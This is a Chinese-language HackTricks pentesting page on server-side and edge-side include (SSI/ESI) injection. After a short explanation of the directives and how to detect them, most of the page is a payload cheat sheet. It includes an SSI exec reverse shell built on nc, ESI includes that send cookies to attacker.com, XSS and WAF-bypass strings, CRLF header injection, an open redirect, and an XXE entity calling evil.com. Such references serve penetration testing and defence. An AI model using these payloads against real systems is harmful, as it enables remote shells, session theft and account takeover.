11 KiB
服务器端包含/边缘端包含注入
从零到英雄学习AWS黑客技术,参加 htARTE (HackTricks AWS红队专家)!
支持HackTricks的其他方式:
- 如果您希望在HackTricks中看到您的公司广告或下载HackTricks的PDF,请查看订阅计划!
- 获取官方PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。**
服务器端包含基础信息
SSI(服务器端包含)是放置在HTML页面中,在服务器上评估的指令,当页面被提供服务时。它们让你向现有HTML页面添加动态生成的内容,而无需通过CGI程序或其他动态技术来提供整个页面。
例如,你可能会在现有的HTML页面中放置一个指令,如:
<!--#echo var="DATE_LOCAL" -->
当页面被提供服务时,这个片段将被评估并替换为它的值:
Tuesday, 15-Jan-2013 19:28:54 EST
决定何时使用SSI,何时让您的页面完全由某个程序生成,通常是一个关于页面有多少是静态的,以及每次提供服务时需要重新计算多少的问题。SSI是添加小信息片段的好方法,比如上面显示的当前时间。但是如果您的页面的大部分在提供服务时被生成,您需要寻找其他解决方案。(定义取自这里)。
如果Web应用程序使用扩展名为** .shtml、.shtm 或 .stm**的文件,您可以推断出SSI的存在,但这并不是唯一的情况。
典型的SSI表达式格式如下:
<!--#directive param="value" -->
检查
// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->
// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->
// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->
边缘端包含(Edge Side Inclusion)
缓存信息或动态应用程序存在一个问题,因为部分内容在下次检索时可能会变化。这就是ESI的用途,通过使用ESI标签来指示需要生成的动态内容,然后再发送缓存版本。
如果攻击者能够在缓存内容中注入一个ESI标签,那么他就能够在文档发送给用户之前注入任意内容。
ESI 检测
以下响应头表明服务器正在使用ESI:
Surrogate-Control: content="ESI/1.0"
如果找不到这个头部,服务器可能仍在使用ESI。
盲目利用方法也可以使用,因为请求应该会到达攻击者的服务器:
// Basic detection
hell<!--esi-->o
// If previous is reflected as "hello", it's vulnerable
// Blind detection
<esi:include src=http://attacker.com>
// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>
// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>
// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">
// Valid for Akamai, sends debug information in the response
<esi:debug/>
ESI 漏洞利用
GoSecure 创建了一个表格,帮助我们理解针对不同支持 ESI 的软件,根据其支持的功能,我们可以尝试的可能攻击。首先,让我们解释一下下表列名的含义:
- Includes: 支持
<esi:includes>指令 - Vars: 支持
<esi:vars>指令。用于绕过 XSS 过滤器 - Cookie: 文档 cookies 可以被 ESI 引擎访问
- Upstream Headers Required: 代理应用程序不会处理 ESI 语句,除非上游应用程序提供了头部信息
- Host Allowlist: 在这种情况下,只能从允许的服务器主机进行 ESI 包含,例如,SSRF 只能针对这些主机进行
| 软件 | Includes | Vars | Cookies | Upstream Headers Required | Host Whitelist |
|---|---|---|---|---|---|
| Squid3 | 是 | 是 | 是 | 是 | 否 |
| Varnish Cache | 是 | 否 | 否 | 是 | 是 |
| Fastly | 是 | 否 | 否 | 否 | 是 |
| Akamai ESI Test Server (ETS) | 是 | 是 | 是 | 否 | 否 |
| NodeJS esi | 是 | 是 | 是 | 否 | 否 |
| NodeJS nodesi | 是 | 否 | 否 | 否 | 可选 |
XSS
以下 ESI 指令将在服务器的响应中加载任意文件
<esi:include src=http://attacker.com/xss.html>
文件 http://attacker.com/xss.html 可能包含像 <script>alert(1)</script> 这样的XSS载荷
绕过客户端XSS保护
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Use <!--esi--> to bypass WAFs:
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>
偷取 Cookie
- 远程偷取 cookie
<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
- 通过在响应中反射来窃取带有 XSS 的 HTTP_ONLY cookie:
# This will reflect the cookies in the response
<!--esi $(HTTP_COOKIE) -->
# Reflect XSS
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->
- 通过反射 cookies 实现完全账户接管
私有本地文件
不要将此与“本地文件包含”混淆:
<esi:include src="secret.txt">
CRLF
<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>
开放重定向
以下操作将在响应中添加一个 Location 头
<!--esi $add_header('Location','http://attacker.com') -->
添加头部
- 在强制请求中添加头部
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>
- 在响应中添加头部(用于绕过带有XSS的响应中的"Content-Type: text/json")
<!--esi/$add_header('Content-Type','text/html')/-->
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
在添加头部中的CRLF(CVE-2019-2438)
<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>
Akamai 调试
这将发送响应中包含的调试信息:
<esi:debug/>
ESI + XSLT = XXE
也可以通过指定 xslt 值给 dca 参数,添加基于** _可扩展样式表语言转换 (XSLT)_ **的 ESI 包含。以下包含将导致HTTP代理请求XML和XSLT文件。然后使用XSLT文件过滤XML文件。这个XML文件可以用来执行 XML外部实体 (XXE) 攻击。这允许攻击者执行SSRF攻击,这并不是非常有用,因为这必须通过ESI包含来执行,而ESI包含本身就是一个SSRF向量。由于底层库(Xalan)不支持外部DTD,因此不解析外部DTD。这意味着我们无法提取本地文件。
<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />
XSLT文件:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>
检查XSLT页面:
{% content-ref url="xslt-server-side-injection-extensible-stylesheet-language-transformations.md" %} xslt-server-side-injection-extensible-stylesheet-language-transformations.md {% endcontent-ref %}
参考资料
- https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/
- https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/
- https://academy.hackthebox.com/module/145/section/1304
- https://infosecwriteups.com/exploring-the-world-of-esi-injection-b86234e66f91
暴力破解检测列表
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt" %}
通过 htARTE (HackTricks AWS Red Team Expert)从零开始学习AWS黑客攻击!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF版本,请查看订阅计划!
- 获取官方的PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。**